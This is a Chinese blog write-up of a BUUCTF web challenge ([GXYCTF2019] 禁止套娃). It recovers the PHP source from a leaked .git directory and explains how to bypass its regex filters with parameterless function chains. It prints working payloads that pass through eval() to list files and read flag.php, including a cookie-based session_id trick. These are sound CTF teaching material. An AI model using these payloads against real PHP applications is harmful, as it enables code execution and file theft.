BUUCTF WEB 禁止套娃1

最新推荐文章于 2023-04-08 14:27:25 发布
最新推荐文章于 2023-04-08 14:27:25 发布
阅读量728 收藏
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/121784956
版权

打开场景,空荡荡的,啥也没有
正常思路,扫目录,dirsearch有防扫,dirmap
扫出来.git,源码泄露没跑了
GitHacker跑出来是空文件,我也不知道为啥
GitHack看看能不能找出什么有用的东西,跑出来index.php的源码
源码如下

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

正则匹配可以自己验证有没有过,先小改一下脚本,再说说他匹配了什么

<?php
    $exp1="print_r(scandir(current(localeconv())));";
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $exp1)) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $exp1)) {
            if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $exp1)) {
                echo "i am here1".$exp1;
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    };
?>

第一层很好理解,过滤的是一堆伪协议,第三层也很好理解,一堆函数名,难的是第二层,
(?R)引用当前表达式,后面加了?递归调用。只能匹配通过无参数的函数。
print_r(scandir(current(localeconv())));
那么就很好理解了,他只能匹配形如a(b())之类的函数,被把它依次替换成空,到最后,exp1只剩下一个;,当然和前面的;相等
正则这关过了,下面就是怎么利用这个eval拿flag了
current()表示数组中指针当前所在的位置
localeconv()函数返回一包含本地数字及货币格式信息的数组,数组第一项是.
也就是因为不能有参数,所以我们用current(localeconv())代替了一个.
那么exp1等价于print_r(scandir(.)),是不是就很熟悉了
当然绕过手段还很多,有兴趣的可以看这位大佬的文章
https://blog.csdn.net/cainiao17441898/article/details/117158702
查找到当前目录下存在flag.php,下面就是读取
回显flag在倒数第二个,随便你怎么读取,正着读也行,不过推荐倒过来读

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

这题的考点应该就是无参数绕过正则
当然我看到有一个常用payload:?exp=readfile(array_rand(array_flip(scandir(current(localeconv())))));
这个是随机读取数组文件,能不能读出来flag.php纯看运气,像我就是试了好多次才读到flag.php文件
或者这一种也是精准打击
抓包,/?exp=readfile(session_id(session_start()))
把cookie里的PHPSESSID改成flag.php
参考视频链接:https://www.bilibili.com/video/BV1o341147Qu/

显哥无敌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [GXYCTF2019] 禁止
nareku的博客
06-29 1391
这题对我这个小白来说好难理解,慢慢补坑吧。PHP很多常用的函数都不是很了解,命令执行也是呜呜呜感觉学得还不是很精通。打开题目,只有如下:看源码也没有什么东西,常见的信息泄露:robots协议,备用文件,目录爆破,.git泄露都试试(看其他师傅的wp:也可以扫描后台,不太清楚为什么自己实操跑不出来有点奇怪),最后发现是.git泄露使用GitHack工具,py脚本跑一下得到后台源码: 得到的源码会留在工具所在的文件夹内,查看里面的index.php页面源码 解题过程: (一)在上面传送门的那个师傅的博
BUUCTF-[GXYCTF2019]禁止
yuqie的博客
04-06 256
对于第二个if,(?R)是引用当前表达式,(?\),可以迭代下去,那么它所匹配的就是print(echo(1))、a(b(c()));所以可以先利用函数array_reverse将数组反转,flag就在第二位了,再利用next指向第二位数组,在用文件显示包涵即可输出flag.php文件,构造payload。开始审计源码,我们最终的目标是执行@eval($_GET['exp']),从这开始瞄一下大佬的wp,因为我的脚本基础差的没眼看。pos(),传入数组,回显第一个数组的值,pos可以用current代替。
web buuctf [GXYCTF2019]禁止1
weixin_44214568的博客
03-24 1730
考点:1.git泄露 2.无参RCE 1.用御剑扫后台没扫到啥东西 看robots.txt文本,也没有 2.都这样了,考虑一下有没有可能存在.git泄露, (我装了两个版本的python,githack需要在python2下运行) index.php源码如下 <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:.
buuctf [MRCTF2020]套
m0_65766842的博客
04-08 228
第二个if要求get传的参不能等于2333且传的参结尾开头中间都是2333,在23333结尾加个换行符url编码为%0a 即可绕过。第一个if过滤了_和url编码的%5f 解码后也是_ ,PHP会将传参中的空格( )、小数点(.)自动替换成下划线。通过查询资料和对比,知道了这是一个jQuery事件,并且使用change()的办法来做题。简而言之就是变量改变会有提醒,因为我们绕过不能有提醒所以上传的v和file相同。通过查询资料,我们可以知道被注释的是一串jsfuck的的编码。我们进行传参之后得到以下代码。
wp-buuctf-禁止(无参绕过)【多方法】
bin789456的博客
11-08 2137
wp 一开始没看到什么东西,那就开始找吧,常用备份,robots协议,目录爆破,git泄露慢慢试。 试了下git泄露,有东西了: 打开得到的index.php,源码如下: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
俄罗斯套
04-17
"俄罗斯套"这个标题可能是指一种特殊的数据处理或存储方式,它借鉴了传统玩具俄罗斯套的概念。在信息技术领域,这种比喻可能用于描述一种数据结构或者编程技巧,其中数据被嵌套在一个又一个的层次中,每个层级都...
俄罗斯套奖品Java程序
08-12
1. **类与对象**:Java是面向对象的语言,程序可能会定义多个类,如`RussianDoll`,每个类代表一个套,包含其属性(如大小、颜色)和方法(如打开、放入小套)。 2. **递归数据结构**:为了模拟套的嵌套结构...
俄罗斯套奖品C++程序
05-19
1. **类与对象**:C++中的面向对象编程允许我们定义类来封装数据和操作数据的方法,创建对象来表示现实世界中的实体,比如每个“”都可以是一个对象,拥有自己的属性(如大小、颜色等)和行为(如打开、关闭等)...
俄罗斯套程序及设计
06-09
1. **递归函数遍历可达路径**:算法的核心是通过递归函数来探索所有可能的路径。递归函数会从当前位置出发,递归地尝试所有可行的下一步,直到到达目标或者无路可走。 2. **记录路径和当前重量**:在递归调用中,...
俄罗斯套问题 回溯法
08-01
1. **定义状态**:首先,我们需要定义问题的状态。在这个问题中,状态可以是每个套目前所处的位置,或者更具体地说,是每个套被放置在哪个更大的套里。我们可以用一个数组或列表来表示这个状态,其中每个元素...
buuctf-[GXYCTF2019]禁止
qq_42728977的博客
12-24 3471
[GXYCTF2019]禁止考点复现法一:单纯构造GET参数法二:构造session组合拳参考 考点 正则表达、无参数rce、git泄露 复现 法一:单纯构造GET参数 打开就一句 然后查看源码,空空如也。想到扫描后台文件,使用御剑很慢,使用dirsearch,一直429,查找资料,加了-s参数,也就是扫描不能太快。 python3 .\dirsearch.py -u http://5c0edec0-316a-4de9-999a-669f813c771b.node4.buuoj.cn:81/ -e
BUUCTF】[MRCTF2020]套
pofesser的博客
01-19 3011
思考 题目是套,感觉应该是一环一环的走下去,每个问题应该不是很难,按着他的提示做吧。 知识点 刷题 刷题的时候,习惯先查看robots.txt是否有敏感信息,然后查看源码。如果这个时候,都没有尝试爆目录了。 查看robots.txt无信息,查看源码。 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d8ab23f032845a691d260644c24d003.png?x-oss-process=image/watermark,type_d3F5LXplbmhl
BUUCTF Web [GXYCTF2019]禁止1 & [BJDCTF2020]ZJCTF,不过如此1
网安小趴菜
09-20 412
BUUCTF Web [GXYCTF2019]禁止1 & [BJDCTF2020]ZJCTF,不过如此1
buuctf-[GXYCTF2019]禁止(小宇特详解)
小宇的web博客
02-12 1189
buuctf-[GXYCTF2019]禁止(小宇特详解) 这里先看题 这里没有找到什么有用的信息,先使用dirsearch来爆破但是没有找到有用的,这时我就怀疑是有git泄露了这里使用githack探测发现了index.php 这里直接看源码吧 <?php 2 include "flag.php"; 3 echo "flag在哪里呢?<br>"; 4 if(isset($_GET['exp'])){//需要以GET形式传入一个名为exp的参数。如果满足条件会执行这个exp参数的
被监督写博客-Day6
veinard_F的博客
10-09 193
今天做的这道题也不是很难,就是在做题的时候需要联系一些函数的功能,先记录一下这些函数: scandir()可以扫描当前目录下的文件 localeconv() 返回一包含本地数字及货币格式信息的数组 array_reverse()以相反的元素顺序返回数组 array_flip()交换数组的键和值 array_rand()从数组中随机取出一个或多个单元,不断刷新访问就会不断随机返回 current()返回数组当前的值 next()将内部指针指向数组中的下一个元素,并输出 题目 [GXYCTF2019]禁止
BUU刷题--禁止
weixin_48631429的博客
11-30 297
BUU 刷题记录 [GXYCTF2019]禁止 首先感叹一句自己的菜! 打开题目: emmmm,F12,抓包,查看是否又备份文件,dirsearch扫描目录一波操作猛如虎,结果没卵用。 还是一样的界面,崩溃。 算了看大佬wp吧 .git泄露,没做过,还能原谅自己,不然直接一巴掌呼自己。 一波操作之后拿到了index.php: <?php include "flag.php"; echo "flag在哪里呢?<br>"; if(isset($_GET['exp'])){ if
BUUCTF__[ACTF2020 新生赛]BackupFile_题解
风过江南乱的博客
07-06 1034
BUUCTF__[ACTF2020 新生赛]BackupFile_题解 PHP的弱类型。`==`和`===` 的差别。
[CISCN2019 总决赛 Day2 Web1]Easyweb && [GXYCTF2019]禁止
crispr的博客
03-17 1318
[CISCN2019 总决赛 Day2 Web1]Easyweb 0X01 前言 现在开始记录BUUCTF上的web了,每周认真刷一些题,了解一些知识点和套路,不要让自己这么菜。。 0X02 正文 发现是一个登录界面,先从登录框fuzz一下,看能否万能密码通过,无果。 一般直接是登录框,肯定隐藏这其他目录或者是源码泄露,所以开始扫目录 dirsearch -u "http://1606db13-...
[GXYCTF2019]禁止(.git泄露,无参RCE)
xlcvv的博客
04-17 3345
这里fuzz了一下,已经确认是源码泄露了,因为都没什么线索了,但是这问题就来了,用dirsearch扫的话,就会因为访问次数过快,导致扫描不出来,啊,那就瞄一下师傅们的wp叭! .git源码泄露,用GitHack拿到index.php: 看到了eval($_GET['exp']),就是一句话木马的GET方式,题目又加了好多过滤限制了REC,这就考验做题者的积累了(我小白积累太少了)。 看代码,第...
ctfshow套shell
最新发布
08-24
CTFSHOW套shell是一种常见的利用技术,用于在Web应用程序中执行命令和控制服务器。根据提供的引用内容,以下是一种使用CTFSHOW套shell的方法: 1. 首先,需要获取CTFSHOW扩展。可以通过运行命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值